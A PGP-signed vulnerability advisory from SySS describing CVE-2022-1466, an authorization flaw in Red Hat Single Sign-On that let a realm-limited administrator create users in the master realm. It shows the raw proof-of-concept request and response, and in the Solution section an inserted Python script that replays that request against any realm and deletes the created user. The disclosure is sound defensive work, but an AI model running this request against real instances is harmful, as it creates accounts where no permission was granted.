-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2021-076
Product: Red Hat Single Sign-On
Manufacturer: Red Hat, Inc.
Affected Version(s): 7.5.0.GA
Tested Version(s): 7.5.0.GA
Vulnerability Type: Incorrect Authorization (CWE-863)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-12-08
Solution Date: 2022-02-07
Public Disclosure: 2022-02-10
CVE Reference: CVE-2022-1466
Author of Advisory: Christian Dölling, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Red Hat Single Sign-On is a single sign-on solution.

The manufacturer describes the product as follows (see [1]):

"Red Hat Single Sign-On (RH-SSO) is based on the Keycloak project and
enables you to secure your web applications by providing Web single
sign-on (SSO) capabilities based on popular standards such as SAML 2.0,
OpenID Connect and OAuth 2.0. The RH-SSO server can act as a SAML or
OpenID Connect-based Identity Provider, mediating with your enterprise
user directory or 3rd-party SSO provider for identity information and
your applications via standards-based tokens."

Due to incorrect authorization, Red Hat Single Sign-On allows users to
perform actions, such as creating users in a realm, for which they were
not granted permission.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It was possible to add users to the master realm via the admin REST API
even though the acting account had not been granted the respective
permission there.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The author was provided with a user account with administrative
privileges in all realms but the master realm. Within the master realm,
only read-only permissions were granted. This was confirmed by the owner
of the Red Hat Single Sign-On instance and was reflected in the web
front end by the fact that an "add user" button was available in all
realms but the master realm.
Nevertheless, when the author sent the following request to the server,
the server responded as shown below.

Request:

POST /auth/admin/realms/master/users HTTP/1.1
Host: login-stage.customer.com
Cookie: INGRESS_SESSION_ID=XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Authorization: Bearer [...]
Content-Length: 146
Origin: https://login-stage.customer.com
Te: trailers
Connection: close

{"enabled":true,"attributes":{},"groups":[],"emailVerified":true,"username":"SySS PoC","email":"poc@cd.sy.gs","firstName":"SySS","lastName":"PoC"}

Response:

HTTP/1.1 201 Created
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://login-stage.customer.com
Access-Control-Expose-Headers: Location
Date: Tue, 07 Dec 2021 15:44:58 GMT
Location: https://login-stage.customer.com/auth/admin/realms/master/users/f5436560-00d0-42db-8486-81db59e61612
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 0
Connection: Close

Afterwards, the author was able to confirm the successful creation of
the user in the web front end.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Check authorization on the server before adding a new user: the
required permission has to be enforced by the admin REST API itself,
not only by hiding the "add user" button in the web front end. The
manufacturer released a fix on 2022-02-07 (see [4]).
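The following probe is an added example and is not part of the SySS advisory or of Red Hat's code. It replays the request pattern from the PoC (POST /auth/admin/realms/{realm}/users) using a token for an account that is not supposed to have manage-users permission in the target realm, judges from the status code whether the server enforced that permission, and deletes the user again if one was created. Every hostname, token and username in it is a placeholder; the RecordedOpener class is a constructed offline stand-in that replays the 201 response recorded in the advisory so the script runs without a server.

```python
"""Authorization probe for the RH-SSO / Keycloak admin REST API.

Added example, not part of the SySS advisory or of Red Hat's code. It replays
the request pattern from the PoC (POST /auth/admin/realms/{realm}/users) with
a token for an account that is NOT supposed to have manage-users permission in
the target realm, and judges from the status code whether the server enforced
that permission. Hostnames, tokens and usernames below are placeholders.
"""
import json
import urllib.error
import urllib.request
from typing import Optional, Tuple


def build_create_user_request(base_url: str, realm: str, token: str,
                              username: str, email: str) -> urllib.request.Request:
    """Build the same kind of POST the advisory's PoC sent, for any realm."""
    body = json.dumps({
        "enabled": True, "attributes": {}, "groups": [], "emailVerified": True,
        "username": username, "email": email,
        "firstName": "authz", "lastName": "probe",
    }).encode("utf-8")
    return urllib.request.Request(
        f"{base_url.rstrip('/')}/auth/admin/realms/{realm}/users",
        data=body, method="POST",
        headers={"Authorization": f"Bearer {token}",
                 "Content-Type": "application/json;charset=utf-8",
                 "Accept": "application/json, text/plain, */*"})


def classify(status: int, location: Optional[str]) -> Tuple[str, Optional[str]]:
    """Turn the server's answer into a verdict plus the created user's ID.

    201 with a Location header means the user was created although the caller
    had no manage-users permission in that realm (the advisory's finding).
    403 means the server rejected the call, i.e. authorization is enforced.
    Anything else (401 bad token, 409 name already taken, 5xx, ...) says
    nothing about authorization and is reported as inconclusive.
    """
    if status == 201 and location:
        return "vulnerable", location.rstrip("/").rsplit("/", 1)[-1]
    if status == 403:
        return "authorization enforced", None
    return "inconclusive", None


def send(req: urllib.request.Request, opener=None) -> Tuple[int, Optional[str]]:
    """Perform the request and return (status, Location header or None).
    urllib raises on 4xx/5xx, so the HTTPError is unwrapped into a status."""
    opener = opener or urllib.request.build_opener()
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


def probe(base_url: str, realm: str, token: str,
          username: str = "authz-probe", email: str = "authz-probe@example.invalid",
          opener=None) -> Tuple[str, int, Optional[str]]:
    """Run the probe; if a user got created, delete it again (the same token
    evidently can manage users, so the DELETE is expected to succeed too)."""
    status, location = send(build_create_user_request(base_url, realm, token,
                                                      username, email), opener)
    verdict, user_id = classify(status, location)
    if user_id:
        cleanup = urllib.request.Request(
            f"{base_url.rstrip('/')}/auth/admin/realms/{realm}/users/{user_id}",
            method="DELETE", headers={"Authorization": f"Bearer {token}"})
        send(cleanup, opener)
    return verdict, status, user_id


class RecordedOpener:
    """Offline stand-in for urllib's opener, constructed for this example: it
    replays the 201 + Location response recorded in the advisory for the POST,
    answers the cleanup DELETE with 204, and records every call it receives."""

    class _Resp:
        def __init__(self, status: int, headers: dict):
            self.status, self.headers = status, headers

        def __enter__(self):
            return self

        def __exit__(self, *exc):
            return False

    def __init__(self):
        self.calls = []

    def open(self, req: urllib.request.Request, timeout=None):
        self.calls.append((req.get_method(), req.full_url))
        if req.get_method() == "POST":
            return self._Resp(201, {"Location": req.full_url
                                    + "/f5436560-00d0-42db-8486-81db59e61612"})
        return self._Resp(204, {})


if __name__ == "__main__":
    # Offline run against the recorded exchange; pass opener=None together
    # with a real base URL and token to test a live instance.
    print(probe("https://login-stage.example", "master", "PLACEHOLDER_TOKEN",
                opener=RecordedOpener()))
```

Run it with a token for a realm-limited administrator against each realm that account should not be able to manage; only a 403 counts as "authorization enforced", while a 401 or 409 means the probe itself was not set up correctly (bad token, or a username that already exists) and says nothing about the authorization check.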
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-12-07: Vulnerability discovered
2021-12-08: Vulnerability reported to manufacturer
2022-02-07: Patch released by manufacturer
2022-02-10: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Red Hat Single Sign-On
    https://access.redhat.com/products/red-hat-single-sign-on
[2] SySS Security Advisory SYSS-2021-076
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-076.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] CVE-2022-1466 on Red Hat Customer Portal
    https://access.redhat.com/security/cve/cve-2022-1466
[5] CVE-2022-1466 on National Vulnerability Database (NVD)
    https://nvd.nist.gov/vuln/detail/CVE-2022-1466

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Dölling of SySS GmbH.

E-Mail: christian.doelling@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_D%C3%B6lling.asc
Key Fingerprint: 5478 245B 07F7 11D8 89EB 4FF9 22CC 67D4 1729 49A2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEVHgkWwf3EdiJ60/5Isxn1BcpSaIFAmJyi4kACgkQIsxn1Bcp
SaJWKxAAolXS6c7cjC/jLGnagkNBVtVYb8cIidLeKS/GsGMC0llDIHekcVOkVNVU
529vzKoaSvaHCvdfWJdvxn9Adv7djnNL9i2hQYNEWot2hvf+XBDECkGUnas8SLQ7
gfte3yLZJJGZHgvIwRxRHqgOdrKl0eCKJ1aNsmcF4LxQ5kKh9bS4QudsNKSH7JbG
I8Sj1rtPJviwMZFWPLcgu2EcR3Rvak/78LcdQtfQzt4HKMOnKSgnMn55DRX+mRcv
tWPiTBL/dKuTEUKeUSY1cqbATKa5MqO6PuXgvic8h9HuXRnEf6QuUnU2qMeMs0qn
n9xrJSK256vMT84slfch2m5Q0jyMSu7aI7sl5EaHEA+9j2G/Sv/yI9b+Qm5iFXZS
RawdZ/XB53Wt/dMfyax1U5WN7mryRsHHhbCjerq6ZYNpx7Q/iCqoL6vNEMizBlW2
TG0rln5qioGTvXFcL2w7cQRfc9ZXg8DefA6gUU+f6atHWQH5aWYKq8ol0QwvlvmC
jjQ/tayRd+DG/fccTpqGSZ8R3oYzt+VX4NrXsZ5osxq3KR9sqo1DH8KLbm3EG1ee
SuN+4iGSARV8ADQR/Kw6jPKM8YZ/TJ4JxOspaU0qV1oVcCJf0F2yteTUulVvG5IY
98hn0UjIpG8vhNf2j3m3d8w7SYGhlBlWzCvkRXRx5xMRSGPNNEE=
=cQvz
-----END PGP SIGNATURE-----